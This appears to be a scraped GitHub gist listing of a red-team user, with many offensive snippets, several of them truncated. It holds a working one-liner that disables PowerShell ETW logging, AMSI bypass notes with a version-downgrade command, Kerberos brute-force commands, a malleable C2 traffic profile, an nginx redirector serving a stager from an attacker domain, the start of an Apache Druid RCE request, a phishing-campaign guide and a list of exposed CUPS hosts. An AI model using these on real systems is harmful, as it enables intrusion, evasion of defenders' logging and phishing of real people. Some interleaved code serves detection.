Christopher CalfCrusher

Pwning
#!/bin/bash
# Function to XOR a string with a key (the key repeats over the string); output is lowercase hex
xor_string() {
  local string=$1
  local key=$2
  local result=""
  for ((i = 0; i < ${#string}; i++)); do
    local char=${string:i:1}
    local kchar=${key:$((i % ${#key})):1}
    # Loop body completed here: take the byte value of each character (printf's "'c" form), XOR, emit as two hex digits
    printf -v c '%d' "'$char"
    printf -v k '%d' "'$kchar"
    result+=$(printf '%02x' $((c ^ k)))
  done
  echo "$result"
}
CalfCrusher / amsi-bypass.md
Created October 7, 2023 15:07 — forked from D3Ext/amsi-bypass.md
All methods to bypass AMSI (2022)

AMSI Bypass

To test any of these techniques, type "Invoke-Mimikatz" into a PowerShell terminal. Even though Mimikatz has not been imported, AMSI flags the string as malicious. If AMSI is disabled or bypassed, PowerShell simply reports that the term is not recognized as the name of a cmdlet, which confirms the bypass worked.

Some methods may be caught by the AV, but most of them work without problems.

PowerShell downgrade

The first and worst way to bypass AMSI is to downgrade PowerShell to version 2.0: the 2.0 engine predates AMSI, so nothing it runs is scanned. It only works if the optional v2 engine (which needs .NET Framework 3.5) is still installed, and the downgrade is trivially visible to defenders, since the Windows PowerShell log records EngineVersion=2.0 in the engine-start event (ID 400).
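
As an added check (example code, not from the forked gist), the manual "Invoke-Mimikatz" test above can be turned into a function that classifies the error PowerShell returns, so a bypass attempt is judged on the error category rather than on reading the message. It assumes Windows PowerShell 5.x on Windows 10 or later with an AMSI-aware AV such as Defender registered; the function name Test-AmsiActive and the probe strings are this example's own.

```powershell
# Added example: classify what happens when a known-bad string is executed in this session.
# Assumes Windows PowerShell 5.x on Windows 10+ with an AMSI provider registered.
function Test-AmsiActive {
    param(
        # Default probes: the manual test from the text (an undefined Mimikatz cmdlet name) plus a
        # benign control. The bad name is assembled at runtime so that loading this function
        # definition is not itself what trips the scan; the string handed to Invoke-Expression is the full literal.
        [string[]]$Probe = @(('Invoke-' + 'Mimi' + 'katz'), 'Write-Output benign-control-probe')
    )
    foreach ($p in $Probe) {
        $verdict = 'executed without error'
        try {
            # Invoke-Expression compiles the string into a script block, which the engine runs through AmsiScanBuffer.
            $null = Invoke-Expression -Command $p
        } catch {
            $id = $_.FullyQualifiedErrorId
            # ScriptContainedMaliciousContent: AMSI returned a detection and the engine refused to run it.
            # CommandNotFoundException: nothing was blocked; the cmdlet simply does not exist,
            # which is what the text describes when AMSI is off or bypassed.
            $verdict = switch -Wildcard ($id) {
                'ScriptContainedMaliciousContent*' { 'blocked by AMSI' }
                'CommandNotFoundException*'        { 'not blocked (command merely unknown)' }
                default                            { "other error: $id" }
            }
        }
        [pscustomobject]@{
            Probe   = $p
            Verdict = $verdict
            Engine  = $PSVersionTable.PSVersion.ToString()
        }
    }
}

# The downgrade from the text, run as a separate process: the 2.0 engine predates AMSI, so the same
# probe executes unscanned there. Requires the optional v2 engine (and .NET Framework 3.5):
#   Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2
#   powershell.exe -Version 2 -Command "Invoke-Mimikatz"
Test-AmsiActive
```

In an unmodified 5.x session the first probe reports "blocked by AMSI" and the control "executed without error"; after a working bypass the first probe drops to "not blocked (command merely unknown)", exactly the "not recognized as the name of a cmdlet" outcome described above.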

CalfCrusher / KillETW.ps1
Created October 7, 2023 15:52 — forked from tandasat/KillETW.ps1
Disable ETW of the current PowerShell session
#
# This PowerShell command sets System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled to 0,
# which effectively disables Suspicious ScriptBlock Logging etc. Note that, for readability, the command itself
# is not obfuscated: it contains the reflection strings that trigger Suspicious ScriptBlock Logging, so it is logged before it takes effect.
#
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
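
To confirm what the one-liner changed, or, on the defensive side, to spot that it has been run in a session, the same private field can be read back instead of overwritten. This is an added example, not part of tandasat's gist; the function name Get-PSEtwProviderState is this example's own, and it assumes Windows PowerShell 5.1, where PSEtwLogProvider and the .NET Framework EventProvider carry these private members.

```powershell
# Added example: read the PSEtwLogProvider state that the KillETW one-liner overwrites.
# Assumes Windows PowerShell 5.1 (System.Management.Automation on the .NET Framework EventProvider).
function Get-PSEtwProviderState {
    $eventProviderType = [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider')
    $psEtwType = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')

    # The static etwProvider field holds the EventProvider instance that writes the
    # Microsoft-Windows-PowerShell events (the 4104 script block records among them).
    $provider = $psEtwType.GetField('etwProvider', 'NonPublic,Static').GetValue($null)

    # m_enabled is the int the kill command sets to 0; EventProvider.IsEnabled() tests it before
    # every write, so 0 means no event leaves this process for that provider.
    $enabled = $eventProviderType.GetField('m_enabled', 'NonPublic,Instance').GetValue($provider)

    [pscustomobject]@{
        Enabled  = ($enabled -ne 0)
        RawValue = $enabled
    }
}

# Usage: snapshot, run the kill command, snapshot again. Enabled flips from True to False.
# Caveat: m_enabled is also 0 when no trace session is listening to the provider at all, so
# compare a before/after pair rather than trusting a single reading.
Get-PSEtwProviderState
```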
CalfCrusher / kerberos_attacks_cheatsheet.md
Created October 15, 2023 10:57 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform Kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With the Rubeus build that includes the brute module:

CalfCrusher / SimulateInternetZoneTest.ps1
Created November 7, 2023 00:18 — forked from mgraeber-rc/SimulateInternetZoneTest.ps1
Example highlighting why attackers likely choose ISO/IMG as a delivery mechanism: it evades SmartScreen because Mark-of-the-Web (MOTW) cannot be applied to files on non-NTFS volumes
# Build a harmless test binary to mark and execute
Add-Type -OutputAssembly hello.exe -TypeDefinition @'
using System;
public class Hello {
    public static void Main(string[] Args) {
        System.Console.WriteLine("Hello, world!");
        System.Console.Read();
    }
}
'@
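
As an added example, not mgraeber-rc's own code, the following applies Mark-of-the-Web to the hello.exe compiled above and reads it back, written so that the non-NTFS failure the gist title refers to is explicit rather than silent. Set-MarkOfTheWeb and Get-MarkOfTheWeb are names chosen for this example; the ReferrerUrl value in the usage line is made up.

```powershell
# Added example: write and read Mark-of-the-Web (the Zone.Identifier alternate data stream),
# failing loudly on volumes that cannot hold alternate data streams.
# Set-MarkOfTheWeb / Get-MarkOfTheWeb are names chosen for this example.
function Set-MarkOfTheWeb {
    param(
        [Parameter(Mandatory)][string]$Path,
        [int]$ZoneId = 3,        # 3 = Internet; 0 local machine, 1 intranet, 2 trusted, 4 restricted
        [string]$ReferrerUrl     # optional, recorded by browsers alongside the zone
    )
    $full  = (Resolve-Path -Path $Path).Path
    $drive = [System.IO.Path]::GetPathRoot($full)
    $fs    = ([System.IO.DriveInfo]::new($drive)).DriveFormat
    if ($fs -ne 'NTFS') {
        # FAT32/exFAT sticks and mounted ISO/IMG images (CDFS/UDF) have no alternate data streams,
        # which is why a payload delivered inside such a container arrives with no zone at all.
        throw "Volume $drive is $fs; Zone.Identifier can only be stored on an NTFS volume"
    }
    $body = "[ZoneTransfer]`r`nZoneId=$ZoneId`r`n"
    if ($ReferrerUrl) { $body += "ReferrerUrl=$ReferrerUrl`r`n" }
    Set-Content -Path $full -Stream Zone.Identifier -Value $body -NoNewline
}

function Get-MarkOfTheWeb {
    param([Parameter(Mandatory)][string]$Path)
    try {
        $raw = Get-Content -Path $Path -Stream Zone.Identifier -Raw -ErrorAction Stop
    } catch {
        # No stream: never marked, stripped (e.g. Unblock-File), or a volume without ADS support
        return $null
    }
    $m = [regex]::Match($raw, '(?m)^ZoneId=(\d+)')
    $zone = if ($m.Success) { [int]$m.Groups[1].Value } else { $null }
    [pscustomobject]@{
        Path   = $Path
        ZoneId = $zone
        Raw    = $raw
    }
}

# Usage with the hello.exe compiled above: mark it as Internet-origin, then read the mark back.
# Copy the same file onto a mounted ISO or a FAT32 stick and Get-MarkOfTheWeb returns $null there.
Set-MarkOfTheWeb -Path .\hello.exe -ZoneId 3 -ReferrerUrl 'https://example.com/hello.exe'
Get-MarkOfTheWeb -Path .\hello.exe
```

Launching the marked copy from NTFS produces the SmartScreen prompt; the copy inside the ISO carries no stream, so there is nothing for SmartScreen to evaluate, which is the point of the gist.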
CalfCrusher / custom_amazon_empire_malleable.profile
Last active December 12, 2023 10:37
Amazon Empire C2 Custom Malleable profile
#
# Modified Amazon browsing traffic profile
#
set sleeptime "10000"; # Sleep time in milliseconds: increased to 10 seconds
set jitter "50";       # Jitter is a percentage of sleeptime (0-99), not a number of milliseconds; the original "500" is out of range
set maxdns "255";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"; # Changed the User Agent
http-get {
CalfCrusher / nginx_example_vhost
Created November 12, 2023 10:05
Nginx as redirector for payloads
# One request-rate bucket per source IP: 5 requests/minute, 10 MB of shared state
limit_req_zone $binary_remote_addr zone=req_zone:10m rate=5r/m;
server {
    root /var/www/attacker-site.com/html;
    index index.html;
    server_name attacker-site.com www.attacker-site.com;
    # Everything else serves the decoy site
    location / {
        try_files $uri $uri/ =404;
    }
    # The stager path gets its own exact-match location so it can be rate-limited and filtered separately
    location = /bypassamsiandrequeststager.txt {
CalfCrusher / CVE-2021-25646 POC
Created September 17, 2024 13:57 — forked from 0xf4n9x/CVE-2021-25646 POC
CVE-2021-25646 Apache Druid RCE POC
POST /druid/indexer/v1/sampler HTTP/1.1
Host: x.x.x.x:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1045
Connection: close

Red Team Phishing with Gophish

This guide will help you set up a red team phishing infrastructure and create, run and evaluate a phishing campaign. This is the basic lifecycle of your phishing campaign:

+---------------------+
|Get Hardware         |   Order / setup a vServer
+---------------------+
+---------------------+
|Setup                |   Install Gophish & Mail Server
+---------------------+
CalfCrusher / current.csv
Created September 27, 2024 16:05 — forked from evilsocket/current.csv
cups sample
ip,user_agent
116.202.x.x,CUPS/2.2.10 (Linux 4.19.0-17-amd64; x86_64) IPP/2.0
212.235.x.x,CUPS/2.2.7 (Linux 4.15.0-213-generic; x86_64) IPP/2.0
202.188.x.x,CUPS/2.3.3op2 (Linux 5.10.0-23-amd64; x86_64) IPP/2.0
202.188.x.x,CUPS/2.3.3op2 (Linux 5.10.0-23-amd64; x86_64) IPP/2.0
5.9.x.x,CUPS/2.2.7 (Linux 5.3.0-64-generic; x86_64) IPP/2.0
147.203.x.x,CUPS/2.2.7 (Linux 4.15.0-176-generic; x86_64) IPP/2.0
60.191.x.x,CUPS/2.2.12 (Linux 5.3.0-64-generic; x86_64) IPP/2.0
64.62.x.x,CUPS/2.2.12 (Linux 5.3.0-64-generic; x86_64) IPP/2.0
103.234.x.x,CUPS/2.4.1 (Linux 5.15.0-118-generic; x86_64) IPP/2.0